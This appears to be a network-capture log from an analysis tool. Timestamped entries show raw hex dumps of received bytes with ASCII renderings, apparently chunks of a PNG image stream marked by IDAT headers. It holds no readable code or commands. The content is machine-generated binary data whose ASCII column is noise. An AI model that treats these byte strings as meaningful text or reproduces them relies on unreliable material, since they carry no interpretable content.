                                                                                                                  2023-08-29 17:16:42 UTC704INData Raw: 93 09 1b 54 64 45 f0 00 ab 49 e6 2f c4 64 ff 10 44 c3 00 fa fe a8 1c 08 a4 4c bf 37 40 b9 f0 b2 fb ab 1c 3c ac ff f8 d5 a5 4f b7 45 ac 4f c5 30 43 ca f8 d6 51 23 f9 d6 43 27 fc d6 a5 02 9a 30 44 46 9d 86 49 09 2d 10 0b b7 f8 d6 33 a9 1f 13 ec 48 10 70 57 41 11 30 45 41 5b d1 4d 63 51 d1 4d 64 1f df c8 08 9c 39 07 10 78 dd c0 9d 59 d1 87 40 0b 11 4c ec b8 11 44 b7 92 5d 95 48 1d f1 c4 43 80 55 4c c3 d5 90 47 a9 10 22 6e e9 1f 44 0f b5 39 d1 ad 69 18 68 39 68 12 f6 96 69 18 f4 4e ed e4 d0 42 a1 e6 f0 bb b6 94 5d d5 08 18 14 4b 20 19 cc c8 e9 58 d1 97 e9 1b 76 4c cd b2 f0 47 29 11 74 e3 40 83 71 4c f1 b8 d9 d3 cc bc d9 4f 67 63 31 46 59 72 30 46 2f 7c 76 48 a9 04 af a9 c1 4a 31 41 1b 0c 31 41 ad f8 d4 78 ae 1d 20 ac a4 b3 e7 49 7b 33 32 4c 25 f9 d4 50 ae 1d
                                                                                                                  Data Ascii: TdEI/dDL7@<OEO0CQ#C'0DFI-3HpWA0EA[McQMd9xY@LD]HCULG"nD9ih9hiNB]K XvLG)t@qLOgc1FYr0F/|vHJ1A1Ax I{32L%P
                                                                                                                  2023-08-29 17:16:42 UTC708INData Raw: a3 4b ff f1 65 05 78 d0 36 3d 5c a2 37 26 6b d0 a9 19 2d 88 00 00 20 00 49 44 41 54 49 49 e4 f0 4b 09 0d 96 37 2c 7c 54 45 39 78 d3 06 26 74 bd 25 62 11 9c 2c 27 f9 dd 06 49 5a bc 4d 26 6a b5 c1 64 03 d3 08 3c 19 bc 31 20 5b a9 31 2c 4d d0 2a 1e 70 b4 20 0a 71 b1 45 3b 19 65 41 25 6a a4 37 c9 75 b5 2b 08 19 d0 ec 6b 11 c8 30 3b 6b b0 48 ad 30 d0 cb 49 19 93 37 2c 78 a4 20 04 6c 94 31 2c 19 c6 45 3f 1b b0 41 1f 81 b5 37 3a 59 f2 64 51 57 d4 c5 48 39 9c 24 27 7e a5 c5 0b 57 b1 57 24 d9 de 45 bc f8 d8 08 26 7d 02 30 c9 5b b9 29 ec 1b 29 e2 4b 3a c2 44 29 1b 75 47 01 7c b1 35 1a fd b5 31 40 23 d0 66 28 15 d4 55 a8 1a d0 45 49 52 95 17 07 5c 9c 44 ac 20 79 45 0d 70 a3 35 28 41 a4 26 21 9d 81 65 40 cc 71 16 27 75 a3 29 08 0c f5 11 07 3b de 00 4d 4c d8 16 0c 4b
                                                                                                                  Data Ascii: Kex6=\7&k- IDATIIK7,|TE9x&t%b,'IZM&jd<1 [1,M*p qE;eA%j7u+k0;kH0I7,x l1,E?A7:YdQWH9$'~WW$E&}0[))K:D)uG|51@#f(UEIR\D yEp5(A&!e@q'u);MLK
                                                                                                                  2023-08-29 17:16:42 UTC712INData Raw: 55 4a 76 40 45 13 6b 00 42 67 ad d4 84 03 37 60 46 05 74 60 45 2e 4b d3 b4 44 69 a0 55 d8 12 b7 b0 79 1a a4 75 4b b0 60 42 f6 09 6f 55 1a 17 ba 6b d9 18 91 77 45 39 88 41 f8 17 a2 fa 1b 08 c1 4f 58 16 81 4d f8 10 61 4e 06 8d d2 fa 78 09 81 4d 3c 0d 01 45 76 15 ed 49 07 49 a3 ed 48 19 80 97 40 7d 00 54 2a e9 d6 5a 30 05 ef 52 76 0e e5 52 48 19 ee 45 46 0c 68 59 1f 6b d1 36 71 05 e1 45 7b b4 00 42 79 29 d0 d4 49 29 04 45 7c c9 d0 bf 7f eb d1 07 bb 1a 2b 4d 14 1d ef 41 72 1d ca 01 fb 37 86 f7 47 06 fd 45 49 3d 7d 97 79 4d 42 52 78 15 bc 9f 61 19 60 03 81 a9 d4 6d 3a 73 d0 25 fb 1d d3 7c 86 5b b7 4a 49 8b f0 57 29 99 50 26 49 08 d0 e6 68 18 90 45 89 d9 10 55 48 e6 f2 45 b1 19 2f ba 2a 19 c1 45 68 18 91 45 46 19 af 4a 49 16 d0 4a 49 16 d0 4a 49 16 d0 76 1a 9e
                                                                                                                  Data Ascii: UJv@EkBg7`Ft`E.KDiUyuK`BoUkwE9AOXMaNxM<EvIIH@}T*Z0RvRHEFhYk6qE{By)I)E|+MAr7GEI=}yMBRxa`m:s%|[JIW)P&IhEUHE/*EhEFJIJIJIv
                                                                                                                  2023-08-29 17:16:42 UTC716INData Raw: 45 c6 19 ca a2 49 59 de a0 49 29 ef c4 aa 19 92 ba c9 a2 2f c5 49 2a 32 66 c9 3a 10 14 89 70 bd 00 00 20 00 49 44 41 54 66 a0 19 10 45 36 fb d0 b5 48 b4 34 6d 46 f3 fa 04 2f 39 b0 45 09 79 d0 ed 48 19 d8 c6 7b 1d d8 71 48 7d d0 44 28 af be 5e 49 3a a4 52 49 19 f4 3e 6e 19 7a 1a 49 19 d0 ee 28 11 d0 f7 2b 19 d0 65 fc 73 d2 45 f0 f9 ba fb 38 19 d1 45 f7 6d dc 45 fd 6c d0 53 49 a3 ad 5a 49 ad aa 45 6b 19 69 3f 6e 19 70 36 49 2e d0 85 3c 19 d0 80 33 19 d1 45 83 67 d3 45 8b 62 d0 4f 49 34 52 61 49 3e 55 45 71 19 e8 cb 73 19 f6 ce 49 5c d0 62 d8 54 d0 71 dd 19 97 45 61 80 88 45 67 bf d0 1a 49 31 4e 27 49 3e 73 45 21 19 f6 e9 3d 19 e9 e2 49 6d d0 62 fb 62 d0 07 cf 19 99 45 0a 8a 81 45 19 8c d0 18 49 57 47 21 49 43 48 45 2f 19 b4 d7 25 19 a0 d3 49 64 d0 18 e9 75
                                                                                                                  Data Ascii: EIYI)/I*2f:p IDATfE6H4mF/9EyH{qH}D(^I:RI>nzI(+esE8EmElSIZIEki?np6I.<3EgEbOI4RaI>UEqsI\bTqEaEgI1N'I>sE!=ImbbEEIWG!ICHE/%Idu
                                                                                                                  2023-08-29 17:16:42 UTC720INData Raw: 02 b9 43 82 35 12 75 20 13 dc a0 d0 eb 49 dd 7b c1 49 d7 7f 45 cf 19 4f 8c fc 19 43 95 49 af d0 e3 80 a2 d0 a8 8a 19 59 45 bc cf 75 45 a8 cb d0 fe 49 bd 7c 85 49 85 14 45 94 19 62 9f 81 19 5e 93 49 e4 d0 df 9e e8 d0 93 96 19 07 45 99 f0 35 45 83 f0 2e b3 96 34 df 45 46 19 df 45 46 19 df 45 46 19 2f 4a 49 16 d0 4a 49 16 d0 4a 49 16 d0 4a 49 16 d0 ba 46 19 df 45 46 19 df 45 46 19 df 45 46 19 df 45 76 16 d0 4a 49 21 98 4a 49 16 d0 44 49 7e b5 47 2b 70 9d 1f 12 43 86 16 1d 18 50 45 37 3b d0 45 34 05 d0 05 15 6f a3 18 1e 4f a2 00 4a 19 d6 5c 52 9d bd 32 30 6c d8 36 1e 71 20 45 4b 1a c8 5a 49 38 52 cd 29 62 aa 31 38 1b 8e 44 00 1f ca 63 63 3a 5c 05 16 74 bf 35 31 78 20 45 60 19 c7 58 61 35 f5 cf 25 90 c0 45 ce 66 ac 44 4d 3d ce 63 49 32 53 45 49 0d 98 00 46 1b
                                                                                                                  Data Ascii: C5u I{IEOCIYEuEI|IEb^IE5E.4EFEFEF/JIJIJIJIFEFEFEFEvJI!JIDI~G+pCPE7;E4oOJ\R20l6q EKZI8R)b18Dcc:\t51x E`Xa5%EfDM=cI2SEIF
                                                                                                                  2023-08-29 17:16:42 UTC724INData Raw: 31 5b 8c 5c 3a 46 19 63 e1 c0 12 12 f4 dd 1f d0 fc e4 86 d6 fb ff b7 c0 45 fc a9 6d 6b d9 8f 00 2e 49 5d a6 a3 8c 11 40 25 81 c3 e2 00 00 20 00 49 44 41 54 bc b6 19 d0 8e b6 e6 b2 f3 bb a3 d0 be a0 fe c9 c1 88 b3 86 45 3e cf 6d ba c1 fb 1d ba 49 98 0e 82 b6 64 0b 87 b6 19 a5 92 f4 e6 bd 96 f1 e6 d0 23 99 ab 2f 19 84 b4 2f 45 1a d0 75 ba 0e dd 4d ba 49 25 11 d0 b6 2a 6c c9 b6 19 fa f3 cb e6 f8 e9 3d e6 d0 6d e9 7c 2f 6c d1 4e 2f 45 6d 92 96 ba 09 87 86 ba 49 24 8d 7f e8 0a dd 50 6a 09 c3 56 5e 1f 49 24 5f 5c 0e 45 d3 08 96 9e b6 16 83 ae 49 e6 c4 1e a4 e7 cf 1f 92 19 30 74 15 da 69 00 28 a8 d0 dc 1e 70 79 c5 16 74 79 45 3e 7a a2 f6 32 46 a4 87 49 89 98 2a 9f ac f5 2a a3 19 33 4c c2 e1 2f 4d 89 e6 d0 ba 58 c2 2f ba 45 c0 2f 45 b6 28 64 bd a0 c3 1e 9f 49 20
                                                                                                                  Data Ascii: 1[\:FcEmk.I]@% IDATE>mId#//EuMI%*l=m|/lN/EmI$PjV^I$_\EI0ti(pytyE>z2FI**3L/MX/E/E(dI
                                                                                                                  2023-08-29 17:16:42 UTC728INData Raw: 44 b7 4e 62 30 6f 44 1a 3b 4a 11 2f 96 c1 29 e7 d6 42 e6 0b 45 d2 2a 2f 9a ec 48 2f a0 09 ab bb ba a2 d8 54 35 5e 84 d0 ba bd c1 7e ba bc c6 69 45 b6 e2 35 fb b6 ed 37 82 4b 4f a1 46 26 be 44 74 c8 a7 d0 dd f4 76 18 e1 b7 68 05 45 f0 e6 be 92 f4 e6 b5 91 49 af 2f 13 86 b4 2f 06 81 19 71 ba 78 d8 41 ba 6c ad d0 3e b6 3e 4e 1b b6 2f 59 45 06 f9 95 13 01 7f e3 6b 4b 2b ee 5d fd 76 c4 51 8f 6c d0 47 c1 dd ac 42 9d c0 40 45 43 e7 31 d9 60 e6 33 e3 c9 53 2f a2 fb 7e 2f ae f9 06 d0 b6 86 8f 2f bf 93 bb 2f 45 b7 fd 62 83 b6 ec 1e 17 49 e6 2f a8 48 d0 31 94 53 19 86 f4 cf c6 57 a6 84 e6 d0 cd ad c8 2f c5 97 de 2f 45 3b cf 6c ba 2f c9 61 ba 49 41 1a ed b6 5f 14 d9 b6 19 e5 fb d9 e6 f9 f0 c8 e6 d0 60 ed 71 2f 6b ef 46 2f 45 00 60 80 f0 63 3b f7 54 c8 06 c8 45 49 5d
                                                                                                                  Data Ascii: DNb0oD;J/)BE*/H/T5^~iE57KOF&DtvhEI//qxAl>>N/YEkK+]vQlGB@EC1`3S/~///EbI/H1SW//E;l/aIA_`q/kF/E`c;TEI]
                                                                                                                  2023-08-29 17:16:42 UTC732INData Raw: cb c5 97 a1 c0 c5 19 63 33 01 6f 08 f6 7a 61 d0 a0 97 ba 04 89 cb 56 62 45 32 e6 b7 8b e7 e6 9b 85 49 8c 2f 77 f2 90 2f 61 e0 19 bb ba 7b 94 9b b2 54 39 d4 65 f1 86 91 00 00 20 00 49 44 41 54 58 66 e8 d3 4b 09 f1 d1 48 49 5a 35 85 40 46 3f ba 44 19 a2 a8 b2 16 a4 a9 b7 0e d0 31 ae e6 cb 37 aa e6 51 45 fa db a1 27 8c 85 3d 0e 49 a0 58 ba 0b d8 44 ba 62 19 6a c1 b6 3d 4d 19 b6 35 50 ca 76 e6 f5 7b 60 74 e5 49 49 09 ef 9b 26 16 9d 98 b6 19 c2 33 a5 e6 c3 c2 b9 e6 d0 56 c6 eb 2f 5f 27 ff 2f 45 1a 81 15 d7 23 a7 4b fd 49 59 6f d5 b6 36 6a c3 b6 19 f4 ee 24 e6 f5 d5 01 e6 d0 63 cc 33 2f 6b 16 2a 61 44 bc 1a df 78 ab 34 dd 7c 9a 19 2b 55 1f fb 2f 56 24 f3 d8 ba 5d 9c a0 1c 37 e9 2f 69 49 6d 03 8e 15 85 53 ce 65 19 10 cf b6 33 79 36 96 36 d0 d2 29 aa f9 c6 0c aa
                                                                                                                  Data Ascii: c3ozaVbE2I/w/a{T9e IDATXfKHIZ5@F?D17QE'=IXDbj=M5Pv{`tII&3V/_'/E#KIYo6j$c3/k*aDx4|+U/V$]7/iImSe3y66)
                                                                                                                  2023-08-29 17:16:42 UTC736INData Raw: 18 0c 86 d0 d7 9b d5 1e 98 c7 d9 31 45 f6 33 1d 39 a5 d0 7e 77 49 cc 57 fc 82 7a 14 73 98 19 c8 64 f6 6f 0e 7e d3 aa d0 5e 3a 87 f1 cd 91 ad 64 45 5b 4d 5c b1 d5 db b5 0f 49 83 f8 63 d5 79 5a 4a 72 19 17 56 2c 61 98 fe 86 b4 d0 c6 73 56 60 27 11 c7 e0 45 a0 f0 e9 58 aa 90 22 9f 49 20 51 bc 5a 38 5c 21 c9 19 b3 43 4d 8f 22 df 4b 5a d0 6a 32 5f 58 ff b6 1b 09 45 2c e0 9a 9b 93 1a a4 d6 49 aa d5 2b 45 d5 4d 99 61 19 b1 39 01 e8 c7 d9 58 38 d0 7d 4b 05 57 e9 4f dc 46 45 7b a1 35 05 8f 4a ed f8 49 b0 59 9b a1 7f e7 c8 bd 19 f2 d3 d5 d5 60 32 1d 48 50 7f 9f 6b 94 f7 6a ef d0 0f 43 da d0 0f e6 13 9a 58 e2 08 0a 05 8d 1b 71 23 6e a3 60 7a 4c f9 fb 4b 4a 1b cd 8a 00 b6 f2 ea 6b 16 7f 67 e6 3b 7f 67 85 50 e4 75 7d 28 f0 72 7d 2d e1 71 88 50 e2 75 b1 2d e2 73 8c 50
                                                                                                                  Data Ascii: 1E39~wIWzsdo~^:dE[M\IcyZJrV,asV`'EX"I QZ8\!CM"KZj2_XE,I+EMa9X8}KWOFE{5JIY`2HPkjCXq#n`zLKJkg;gPu}(r}-qPu-sP
                                                                                                                  2023-08-29 17:16:42 UTC740INData Raw: 31 09 58 e9 08 b1 6c d8 35 41 21 d0 79 40 6d e4 c0 9b 6d fa c5 46 a7 10 15 a1 48 8f b5 44 19 0b 1c 3d 0a 55 85 3d 11 99 96 44 e6 d7 37 49 f2 d7 65 48 1a 11 95 49 e6 d7 03 a0 76 00 6d 0a 1c b6 21 8d 80 b6 00 00 20 00 49 44 41 54 45 09 1c 60 4a a0 06 c0 44 c9 12 55 45 89 47 8b 31 4a 9a f0 45 c1 e6 d1 8c 9c 01 87 2d 4d 19 c8 41 f7 b1 30 5f 1f 73 d0 83 4c 19 7c 70 55 61 d0 ba 5c 11 f0 05 50 61 71 61 e9 07 55 85 49 90 e5 b5 7e 05 a8 31 4e 19 50 7d 49 92 08 30 4b 92 d0 9b c4 5c 2c 15 23 19 5d 45 34 e1 e3 85 c2 d2 38 63 5b e7 61 40 b5 24 f0 43 76 40 89 45 3a 56 5b 08 b1 9a 29 ba 49 6a 97 ce b1 d8 37 47 c4 19 d4 4a 72 d8 a2 7e 19 f1 d4 c3 7a c9 f4 b5 cc ef 89 31 0b 37 31 46 c4 1d e7 13 49 1d 5b 45 82 27 6c 45 a1 fe 2d ba b6 92 95 b9 49 40 98 1c ea cd e7 59 31 11
                                                                                                                  Data Ascii: 1Xl5A!y@mmFHD=U=D7IeHIvm! IDATE`JDUEG1JE-MA0_sL|pUa\PaqaUI~1NP}I0K\,#]E48c[a@$Cv@E:V[)Ij7GJr~z171FI[E'lE-I@Y1
                                                                                                                  2023-08-29 17:16:42 UTC744INData Raw: 41 71 01 50 76 3c 1a 59 30 b5 19 5b 10 b5 94 95 bd 19 4a 90 16 c4 64 24 ad 52 59 5b ce 09 5c 28 c6 8d 15 ed c5 50 26 d0 36 03 92 9d b1 ca e0 2f 45 3a 5b 5b bd 88 fe d2 c8 49 1d df 7e 88 6b e6 15 a1 1d ec 65 c9 8a 20 7e ba 40 a4 07 60 9d df 46 b7 4e 86 44 59 c3 f2 b8 4c 09 98 e6 9d 59 ca cc 7c 1f 08 05 48 19 63 46 ca d1 2f 1a 49 47 8b 8c 8a 4a 86 ce 7c 1b f8 85 6b 4e e3 9e 7a e6 eb 0d ba 6c c8 45 4f f0 41 45 20 25 d0 78 3d 18 97 13 a1 6a cd 45 48 19 89 c8 3d 1f d1 cf 49 1f ea 86 3c f3 ba 41 0e 01 87 ad 45 d8 cb 05 81 40 89 cc 5d 24 30 84 66 d2 13 55 1c f2 90 4d 1f f1 92 45 45 92 38 00 c9 19 ee 78 10 6d ff 2f 48 4c 50 ad 97 06 d0 45 72 da 10 4f 49 1e a4 05 1f 4c 80 ad e5 3e d0 4d 49 3d d0 bd 44 4a d1 45 a1 9c d2 24 c9 9d 14 51 ca de d4 46 09 ec e8 5b 3c a5
                                                                                                                  Data Ascii: AqPv<Y0[Jd$RY[\(P&6/E:[[I~ke ~@`FNDYLY|HcF/IGJ|kNzlEOAE %x=jEH=I<AE@]$0fUMEE8xm/HLPErOIL>MI=DJE$QF[<
                                                                                                                  2023-08-29 17:16:42 UTC748INData Raw: 4d c2 19 08 c6 b2 e6 a5 00 b6 0c d2 21 89 19 ba 47 17 22 16 37 49 16 53 bd 4a 6f fa c6 b1 19 d8 31 51 9a 28 57 3d 39 9c ad 79 49 d5 83 47 f0 5e c4 4c 04 53 67 48 59 c9 45 a2 f2 38 55 89 19 90 cc 79 f2 32 ce cc 88 d5 68 cb 99 80 e5 f2 b5 5f 00 00 20 00 49 44 41 54 44 be c1 cb 85 6a fb d0 65 c0 1f 5d c0 89 69 d0 15 a1 9b 09 94 49 5f d4 c8 cc d1 32 45 0b d3 32 45 41 94 55 95 ab 19 6b 64 ab 19 dc ce cc c5 52 45 59 94 5c c0 a1 68 d1 47 21 9a 16 51 99 41 ca 4d f8 09 c8 54 53 3b de ad db 55 d1 87 44 92 13 1e c2 54 2c 1a 49 2a 1d 1b a1 b5 8d 45 49 16 bf 57 2a 0b 00 09 db 0b a5 67 a1 79 f0 43 49 19 e3 ba 30 0b a2 08 c4 6f c2 93 b9 19 02 51 4e f1 e8 35 4b 4d 3b 9d be 0b 5c 96 56 26 1e 57 6d dc 11 57 5b d8 c2 5f a1 1a 90 46 1a 1c f0 ae f9 f1 26 40 2f 0b 73 ad ff f0
                                                                                                                  Data Ascii: M!G"7ISJo1Q(W=9yIG^LSgHYE8Uy2h_ IDATDje]iI_2E2EAUkdREY\hG!QAMTS;UDT,I*EIW*gyCI0oQN5KM;\V&WmW[_F&@/s
                                                                                                                  2023-08-29 17:16:42 UTC752INData Raw: bf 69 a2 d0 0a c9 19 a3 5c c2 d3 03 ae c4 55 d0 47 4d ee 03 64 15 a1 94 55 b7 10 a5 66 49 59 f1 5c a2 09 cc c8 03 f9 56 49 d5 a1 14 4e c9 0f d0 4b 4f 18 de 1c 4d 92 8d 45 45 92 83 4d c2 42 d4 ce 49 54 2c 46 04 ed 59 1f 4d 09 5b 10 45 92 50 47 1b 11 59 61 1a 11 50 0c c2 c8 5a 7f 14 e1 54 c6 aa 19 f3 b1 46 9c 5f 85 58 11 fb 30 b1 59 d4 84 b2 1d ba 45 76 90 a5 49 02 47 eb 9b c9 6f d2 ce 97 1a 9d bd 0a 14 dc 7e 9f 19 c0 05 4d cf eb 9f 3d 19 8e ce 04 15 5b 34 4d 22 d0 34 41 6c eb c6 b2 39 6e 44 8b 35 c7 ce 82 ca 3e b2 9f 1d f1 31 89 32 9c 46 4d 6c f1 c4 48 3c e1 ae 53 94 9b a5 8b 1c be f1 0a 32 51 43 8b 32 a1 c5 60 59 c1 4d 69 92 99 41 c0 57 13 47 4d 92 f0 0c 41 90 9e 4d 49 40 3b 46 49 92 8d 4d ca 64 24 45 3c 59 d8 7e 93 16 54 c5 09 17 5b c5 04 e9 5d 49 98 92
                                                                                                                  Data Ascii: i\UGMdUfIY\VINKOMEEMBIT,FYM[EPGYaPZTF_X0YEvIGo~M=[4M"4Al9nD5>12FMlH<S2QC2`YMiAWGMAMI@;FIMd$E<Y~T[]I
                                                                                                                  2023-08-29 17:16:42 UTC756INData Raw: ce 49 55 40 01 7a e6 f3 8b 3c 1f c2 41 42 99 da 2f 69 46 3b 46 49 1a 19 02 cc d0 ad bc c2 18 90 41 1d e0 d4 ce 43 32 9d 45 b9 92 21 84 b7 1d 9e c6 49 e7 ef cc 04 e1 ae 46 23 99 ef 1b 72 ee df c1 48 f9 d8 45 c2 53 d4 7e 03 11 a5 19 59 9a 2f 65 f2 b8 a4 38 6f 92 d0 ae ce da f6 00 00 20 00 49 44 41 54 8a 9a f2 5b 08 b5 94 ac 55 71 1d 27 96 a9 6d f3 19 c1 9d 94 cc 29 19 2e 4a 3c 2a d1 22 49 44 d8 64 42 f2 fc c8 06 2b 30 86 4d 95 58 c7 5e bb d5 64 50 7d 2e 4a 69 1f a5 4e c9 1d 90 40 68 09 9b 41 a2 1a 90 44 ca 64 28 44 a9 15 d8 ce 33 1d 59 3c 4d 18 d0 4b c2 63 d8 cc 30 11 df 41 cd 94 51 64 04 ed 5d 49 b8 99 5b 3c 4d 90 9a 4d c0 19 d4 67 18 18 d4 cc 18 11 34 57 17 93 d0 09 4f 1d 58 08 42 e7 11 55 ca e7 f0 cd 29 18 ad 66 c9 59 ad 4e 49 6c db fa c8 0c 5b c5 87 ca
                                                                                                                  Data Ascii: IU@z<AB/iF;FIAC2E!IF#rHES~Y/e8o IDAT[Uq'm).J<*"IDdB+0MX^dP}.JiN@hADd(D3Y<MKc0AQd]I[<MMg4WOXBU)fYNIl[
                                                                                                                  2023-08-29 17:16:42 UTC760INData Raw: 97 49 93 20 03 c3 4c 2f 4a fe 19 12 23 72 d8 a5 5d 2f 22 08 8e 3c 87 09 4d 19 0a 8e d5 39 fa c5 90 c8 18 20 90 5c fe 48 51 9c 48 86 d5 5d 5a 76 3f 78 0b cc ad ba dc 0b 4b 4e 92 03 4b c9 1e ba 51 58 03 38 8a 75 1b d4 a6 45 2b d2 ae 4c 20 a5 4d 43 6b e1 4f 77 db c7 b5 a1 7e 22 44 09 25 9d b1 70 40 d8 c8 0f 19 2f 31 55 51 e9 00 41 6e d0 4f 46 af c0 b3 0d 13 cd 45 4d 6c 20 ce 87 32 18 c6 c9 f8 d1 6e b8 57 5b 83 ca 65 a7 56 15 c8 db dd 43 43 00 50 d1 13 c3 07 b9 3d 38 4f 88 1c a5 b1 c9 12 8e 4d 69 6c c2 ba 3c 15 c1 52 81 c0 99 54 5e f0 5b 04 11 54 d8 d5 58 31 a4 ad 68 c5 da 70 9a 13 49 c6 69 12 b8 45 70 44 dc 31 9a 21 c9 31 49 52 87 ce 0c 15 3b 6d c3 99 c0 4a ff e3 26 01 7e f9 c7 45 5e 23 c1 30 41 93 80 44 49 23 81 44 3d 0d 5d 15 48 19 e8 5f 3d 14 5b 87 a2 1d
                                                                                                                  Data Ascii: I L/J#r]/"<M9 \HQH]Zv?xKNKQX8uE+L MCkOw~"D%p@/1UQAnOFEMl 2nW[eVCCP=8OMil<RT^[TX1hpIiEpD1!1IR;mJ&~E^#0ADI#D=]H_=[
                                                                                                                  2023-08-29 17:16:42 UTC764INData Raw: 76 89 f1 8d bc 72 e9 ca 77 06 59 c2 e1 38 94 41 45 a1 5d d1 25 4e 92 bc 61 5d 2a 26 7e 49 f7 89 ce b1 6c ce ad ec 99 7f ba b6 73 c6 1a 1f 18 d0 65 c0 21 38 ff bf bb c5 ce 8e 18 e2 f3 72 e7 83 cc 3c 19 df 47 cc 59 ee 83 f5 19 d0 2d 69 57 c9 3d b6 0c d0 4d 08 00 a8 ce 91 22 0e 45 3c 07 38 2f e6 e6 2f 76 33 49 1f 00 00 20 00 49 44 41 54 2f 41 0f 8f 13 48 19 59 7d a1 66 d0 b3 b6 e6 53 81 5d 92 17 c5 a0 92 d0 45 49 71 dc 45 f1 39 83 ba 5c 0d 90 45 f5 e1 eb 65 b7 6c ff ad 73 19 8e ce 74 1b b4 44 69 c1 2f 92 19 f1 3f cd e7 e6 2f 46 31 1a 38 07 4b 61 da 5d 48 35 08 45 65 40 3b 0f 1e 11 38 65 de 19 c0 ce b9 f1 56 44 49 17 86 2d 09 59 cc 3d c0 59 94 61 55 e6 c5 41 49 9b eb e5 0d 3d c4 31 4e 19 8f 45 49 15 d0 2f 4d 4c 2f 92 cc d9 a5 cd 5d f1 07 45 72 de d0 49 49 66
                                                                                                                  Data Ascii: vrwY8AE]%Na]*&~Ilse!8r<GY-iW=M"E<8//v3I IDAT/AHY}fS]EIqE9\EelstDi/?/F18Ka]H5Ee@;8eVDI-Y=YaUAI=1NEI/ML/]ErIIf
                                                                                                                  2023-08-29 17:16:42 UTC768INData Raw: f0 2a 98 85 05 1a f1 9a e1 08 7a 51 2a 10 28 93 1c c0 18 5b c7 21 19 9c ac f5 30 50 d7 c8 a4 d1 49 b9 99 f1 31 64 1e 50 56 89 91 11 d7 75 29 2f 72 b6 11 c5 c1 09 58 c5 30 5c e6 e7 41 a1 1b 10 54 b6 6a 84 ad b3 9b 73 05 05 7a 9c 45 10 40 10 ce c8 9c a9 40 88 f8 d4 82 49 19 77 d5 49 90 d4 74 cb 8b a0 1a 08 a4 04 97 bb 58 6d 31 0f a4 48 05 41 5e 6d 44 09 02 83 13 7a c2 eb 86 c2 19 22 12 c0 6c 0c 31 55 22 90 8e 3d 15 80 ad 93 b9 a8 1c 45 f0 56 e5 40 19 c1 ce 0d 29 98 41 a0 63 b0 44 72 d2 17 00 ad 58 f2 49 14 f1 df c1 2a 39 d1 c5 59 20 9c 4a cc 98 f8 c5 30 18 d2 06 6a 5b 50 3c 4b 46 df c0 6b f3 b1 06 b0 71 34 05 6b 4e 38 01 f7 b6 50 44 91 9c 0b c4 28 d4 d1 45 4a 32 17 cc 0c fd df c1 cb db 71 40 72 22 df c1 f0 19 d1 0d 8e 5c 30 64 42 a7 c4 65 4f f2 c0 46 c2 5c
                                                                                                                  Data Ascii: *zQ*([!0PI1dPVu)/rX0\ATjszE@@IwItXm1HA^mDz"l1U"=EV@)AcDrXI*9Y J0j[P<KFkq4kN8PD(EJ2q@r"\0dBeOF\
                                                                                                                  2023-08-29 17:16:42 UTC772INData Raw: e3 e2 d6 d4 25 4b e1 56 29 4b 9d 14 41 63 21 19 41 9b 44 d2 1b 1d 1b c2 65 5b 18 b4 10 21 81 f0 08 19 f1 1e 47 90 98 d1 49 ca e1 d3 30 46 79 ba 53 a1 a7 04 05 25 b9 89 7d 4b 44 61 1f 4d 6c d3 89 a2 45 d0 c6 b1 1c a5 17 a2 4c 38 45 65 3e d0 45 2f ee 90 09 49 15 d1 30 5e 2a 0b 16 23 89 d4 16 a1 00 f0 44 ca d9 30 51 5d f9 fe 44 4e 09 13 36 5a c7 5f 00 00 20 00 49 44 41 54 5b 1e 4f b8 61 a5 03 d0 21 b2 3f 04 44 f3 36 f5 55 69 f4 05 45 0f 34 61 47 51 f1 c2 b3 59 8d 5b c8 a8 7b 8f 1b 7a 39 1d 1e a1 ff 0c f5 2d dc 68 44 b9 19 19 86 ca 3c f0 0c 55 09 a8 45 8a d5 d1 45 ca f5 c4 45 1a 92 8c 61 61 4c 5b 29 49 3d f0 13 c2 6a d8 76 3c 18 40 20 4f 9a 28 bb 8f 5d f4 05 5a 19 17 01 6d 01 01 0d c4 19 ab 55 3d 15 5b 0b 4d 1a d0 8a 7a 15 e8 ba 1d 3d fc 05 c2 57 dc ce 0f 11
                                                                                                                  Data Ascii: %KV)KAc!ADe[!GI0FyS%}KDaMlEL8Ee>E/I0^*#D0Q]DN6Z_ IDAT[Oa!?D6UiE4aGQY[{z9-hD<UEEEaaL[)I=jv<@ O(]ZmU=[Mz=W
                                                                                                                  2023-08-29 17:16:42 UTC776INData Raw: ad 08 f9 d0 c6 8d 3d 52 7c 49 11 95 a5 46 9d a1 e5 4d d9 e9 18 95 16 54 2d c9 19 10 b5 65 9d b0 47 48 09 3b 12 cb 19 08 4a 4d 9d 9e c5 49 92 95 91 c0 01 d0 76 89 92 9d a5 c1 1d d8 01 09 24 10 89 49 65 22 55 18 49 c1 a5 cb e6 c5 91 3b 0b df c1 6d 18 40 47 ca 64 38 40 46 9e ca 44 d9 19 df f2 0c f1 53 bd 48 19 59 00 99 67 fd 7d 14 f7 d0 31 61 94 95 aa c3 11 ea 45 82 6d cf 4a ff 61 2f 4a 41 af 19 ae d9 ed 30 83 4d 16 ea f9 49 39 df f3 41 5e eb bc 37 19 21 05 09 21 88 ba 3c c2 d0 ce 0c c5 83 16 b6 6f d4 c5 4c 19 d1 45 49 49 b8 44 61 19 2f 30 a9 90 95 81 23 18 d0 16 a1 27 31 ba b6 9a 14 05 69 9c 10 4a cd ac d0 25 c2 39 9d a1 c2 5c 30 44 13 a6 2f c5 49 19 d0 12 c8 d8 51 45 45 11 81 12 09 1d be 33 5d 4a 38 11 59 c6 d1 21 6d 18 b4 c7 48 7d 95 23 91 1b 6a 44 19 4e
                                                                                                                  Data Ascii: =R|IFMT-eGH;JMIv$Ie"UI;m@Gd8@FDSHYg}1aEmJa/JA0MI9A^7!!<oLEIIDa/0#'1iJ%9\0D/IQEE3]J8Y!mH}#jDN
